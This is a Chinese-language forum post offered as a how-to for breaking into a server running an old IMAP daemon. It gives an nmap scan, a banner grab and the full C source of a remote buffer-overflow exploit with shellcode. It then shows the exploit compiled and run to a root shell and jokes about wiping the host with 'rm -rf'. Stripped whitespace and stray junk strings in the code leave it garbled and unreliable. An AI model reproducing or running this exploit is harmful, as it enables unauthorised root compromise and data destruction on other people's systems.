利用imap漏洞的入侵

显示全部楼层 · 2012-4-1 19:22:51

[cracker@ns2:~/]nmap-sF-Ovictim.com(用扫描工具如nmap扫描主机上开放的端口和服务。)
PortStateProtocolService

21opentcpftp

23opentcptelnet

25opentcpsmtp

53opentcpdomain,

80opentcphttp

81opentcphosts2-ns

110opentcppop-3

143opentcpimap

[cracker@ns2:~/]telnetvictim.com143(imap很可疑,telnet上去看看imap)

版本)

*OKvictim.comIMAP4rev1v10.190serverready(咦,版本10.190

？有漏洞的服务了，去找exploit)w
$X%a6b-b'n;r(K
[cracker@ns2:~/]ls(imap.c是从www.hack.za.co下的)'

imap.c

[cracker@ns2:~/]moreimap.c
/*UltimateIMAP4sploitcodedbyTheTekneeqCrew*/

/*http://www.attrition.org/hosted/tekneeq*/
#include<stdio.h>

#include<stdarg.h>

#include<unistd.h>

#include<sys/time.h>

#include<sys/types.h>

#include<netinet/in.h>

#include<netdb.h>
#defineRET_POS1028
intconnect_tcp(structin_addraddr,unsignedshortport);

intfdprintf(intdafd,char*fmt,...);

voidRunShell(intthesock);
structtypes{

char*name;

unsignedlongret_addr;

};
structtypestypes[]={

{"IMAP4rev19.0",0xbffff6e4},

{"IMAP4rev1v10.190",0xbffff30f},

{"IMAP4rev1v10.223",0xbffff6e4},

{"IMAP4rev1v10.203",0xbffff30f},

{"IMAP4Service8.3",0xbffff724},

{NULL,0}

};
charoverflow_buff[4096];

structin_addrvictim;
/*standardshellcodewithafewmodifications*/

charhellcode[]=

"\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80\x46\x03\x30"

"\x80\x46\x05\x30\x80\x46\x06\x30\x89\xf0\x89\x46\x08\x31\xc0"3U!k-F)R4o%w

"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56"

"\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff"

"\x2f\x32\x39\x3e\x2f\x43\x38";
intmain(intargc,char**argv)

{

unsignedlong*ret;

charrecvbuf[1024];

intsockfd;

inti,n=0;
if(argc<2)

{

printf("Usage:%s<hostname>[offset]\n",argv[0]);

exit(0);

}
if(!host_to_ip(argv[1],&victim))

{

fprintf(stderr,"Hostnamelookupfailure\n");

exit(0);

}
memset(overflow_buff,0x90,4096);

for(i=RET_POS-(strlen(hellcode));i<RET_POS;i++)

overflow_buff=hellcode[n++];
if((sockfd=connect_tcp(victim,143))<0)

{

fprintf(stderr,"Errorconnectingtoremotehost\n");

exit(0);

}

n=read(sockfd,recvbuf,1024);

if(n<=0){

fprintf(stderr,"Connectionclosed\n");

exit(0);

}

printf("%s\n",recvbuf);

for(i=0;;i++)

{

if(types.name==NULL)

{

i=0;

break;

}

if(strstr(recvbuf,types.name))

break;

}

printf("Imaptype%d\n",i);

ret=(unsignedlong*)(overflow_buff+RET_POS);

*ret=types.ret_addr;

if(argv[2])*ret+=(unsignedlong)atoi(argv[2]);

overflow_buff[RET_POS+4]=0;

printf("Sendingoverflow\n");

fdprintf(sockfd,"*AUTHENTICATE{%d}\n",strlen(overflow_buff));

fdprintf(sockfd,"%s\r\n",overflow_buff);

read(sockfd,recvbuf,1024);

printf("Gotshell\n");

RunShell(sockfd);

close(sockfd);

return;

}
voidRunShell(intthesock)

{

intn;

charrecvbuf[1024];

fd_setrset;
while(1)

{

FD_ZERO(&rset);

FD_SET(thesock,&rset);

FD_SET(STDIN_FILENO,&rset);

select(thesock+1,&rset,NULL,NULL,NULL);

if(FD_ISSET(thesock,&rset))

{

n=read(thesock,recvbuf,1024);

if(n<=0)

{

printf("Connectionclosed\n");

exit(0);

}

recvbuf[n]=0;

printf("%s",recvbuf);

}

if(FD_ISSET(STDIN_FILENO,&rset))

{

n=read(STDIN_FILENO,recvbuf,1024);

if(n>0)

{

recvbuf[n]=0;

write(thesock,recvbuf,n);

}

}

}

}
intfdprintf(intdafd,char*fmt,...)

{

charmybuffer[4096];

va_listva;
va_start(va,fmt);

vsnprintf(mybuffer,4096,fmt,va);

write(dafd,mybuffer,strlen(mybuffer));

va_end(va);

return(1);

}

intconnect_tcp(structin_addraddr,unsignedshortport)

{

structsockaddr_inserv;

intthesock,flags;
thesock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

bzero(&serv,sizeof(serv));

memcpy(&serv.sin_addr,&addr,sizeof(structin_addr));

serv.sin_port=htons(port);

serv.sin_family=AF_INET;

if(connect(thesock,(structsockaddr*)&serv,sizeof(serv))<0)return(-1);

else

return(thesock);

}

inthost_to_ip(char*hostname,structin_addr*addr)

{

structhostent*res;
res=gethostbyname(hostname);

if(res==NULL)

return(0);

memcpy((char*)addr,res->h_addr,res->h_length);

return(1);

}

/*www.hack.co.za*/

3S+a:f2K7`-C2J3d
[cracker@ns2:~/]gccimap.c-oimap(编译imap.c)

(运行imap:./imapoffsetip,offset的数值可更改)

[cracker@ns2:~/]./imap0victim.com

(运行./imap,直到spawn到一个shell为止。若成功反应如下)
*OKvictim.comIMAP4rev1v10.190serverready
Imaptype1

Sendingoverflow

Gotshell(有shell了)
#id(打id看看自己是谁)

uid=0(root)gid=0(root)groups=0(root)
(那么主机的命运就操纵在你手上了，你是root了，来个rm-rf超度它？算了吧。)
入侵一架主机就那么容易。只要找到主机上有漏洞的服务如imap,qpop,rpcservices，

再找些exploit跑跑，那么入侵就机会成功。其他imap拥有一样的漏洞的版本是:(

IMAP4rev1v10.233,10.205,10.203,10.196,10.166

这些漏洞都利用了bufferoverflow缓冲溢出的原理.
*
*